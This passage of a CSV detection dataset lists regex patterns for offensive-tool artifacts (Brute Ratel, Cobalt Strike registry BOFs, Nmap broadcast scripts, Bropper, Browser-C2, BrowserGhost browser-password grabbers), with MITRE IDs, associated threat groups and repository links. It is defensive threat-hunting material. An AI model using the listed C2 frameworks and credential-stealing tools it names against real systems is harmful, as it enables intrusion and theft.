Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","5775"
"*/brc-1.2.2.git*",".{0,1000}\/brc\-1\.2\.2\.git.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5776"
"*/BRC4_rar",".{0,1000}\/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5777"
"*/breg.x64.o*",".{0,1000}\/breg\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","5778"
"*/breg.x86.o*",".{0,1000}\/breg\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","5779"
"*/broadcast-ataoe-discover.nse*",".{0,1000}\/broadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5780"
"*/broadcast-avahi-dos.nse*",".{0,1000}\/broadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5781"
"*/broadcast-bjnp-discover.nse*",".{0,1000}\/broadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5782"
"*/broadcast-db2-discover.nse*",".{0,1000}\/broadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5783"
"*/broadcast-dhcp6-discover.nse*",".{0,1000}\/broadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5784"
"*/broadcast-dhcp-discover.nse*",".{0,1000}\/broadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5785"
"*/broadcast-dns-service-discovery.nse*",".{0,1000}\/broadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5786"
"*/broadcast-dropbox-listener.nse*",".{0,1000}\/broadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5787"
"*/broadcast-eigrp-discovery.nse*",".{0,1000}\/broadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5788"
"*/broadcast-hid-discoveryd.nse*",".{0,1000}\/broadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5789"
"*/broadcast-igmp-discovery.nse*",".{0,1000}\/broadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5790"
"*/broadcast-jenkins-discover.nse*",".{0,1000}\/broadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5791"
"*/broadcast-listener.nse*",".{0,1000}\/broadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5792"
"*/broadcast-ms-sql-discover.nse*",".{0,1000}\/broadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5793"
"*/broadcast-netbios-master-browser.nse*",".{0,1000}\/broadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5794"
"*/broadcast-networker-discover.nse*",".{0,1000}\/broadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5795"
"*/broadcast-novell-locate.nse*",".{0,1000}\/broadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5796"
"*/broadcast-ospf2-discover.nse*",".{0,1000}\/broadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5797"
"*/broadcast-pc-anywhere.nse*",".{0,1000}\/broadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5798"
"*/broadcast-pc-duo.nse*",".{0,1000}\/broadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5799"
"*/broadcast-pim-discovery.nse*",".{0,1000}\/broadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5800"
"*/broadcast-ping.nse*",".{0,1000}\/broadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5801"
"*/broadcast-pppoe-discover.nse*",".{0,1000}\/broadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5802"
"*/broadcast-rip-discover.nse*",".{0,1000}\/broadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5803"
"*/broadcast-ripng-discover.nse*",".{0,1000}\/broadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5804"
"*/broadcast-sonicwall-discover.nse*",".{0,1000}\/broadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5805"
"*/broadcast-sybase-asa-discover.nse*",".{0,1000}\/broadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5806"
"*/broadcast-tellstick-discover.nse*",".{0,1000}\/broadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5807"
"*/broadcast-upnp-info.nse*",".{0,1000}\/broadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5808"
"*/broadcast-versant-locate.nse*",".{0,1000}\/broadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5809"
"*/broadcast-wake-on-lan.nse*",".{0,1000}\/broadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5810"
"*/broadcast-wpad-discover.nse*",".{0,1000}\/broadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5811"
"*/broadcast-wsdd-discover.nse*",".{0,1000}\/broadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5812"
"*/broadcast-xdmcp-discover.nse*",".{0,1000}\/broadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5813"
"*/Bropper.git*",".{0,1000}\/Bropper\.git.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","5814"
"*/bropper.py*",".{0,1000}\/bropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","5815"
"*/Browser-C2*",".{0,1000}\/Browser\-C2.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105  - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","102","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z","5816"
"*/BrowserDataGrabber.git*",".{0,1000}\/BrowserDataGrabber\.git.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","5817"
"*/BrowserGhost.exe*",".{0,1000}\/BrowserGhost\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5818"
"*/BrowserGhost.git*",".{0,1000}\/BrowserGhost\.git.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5819"
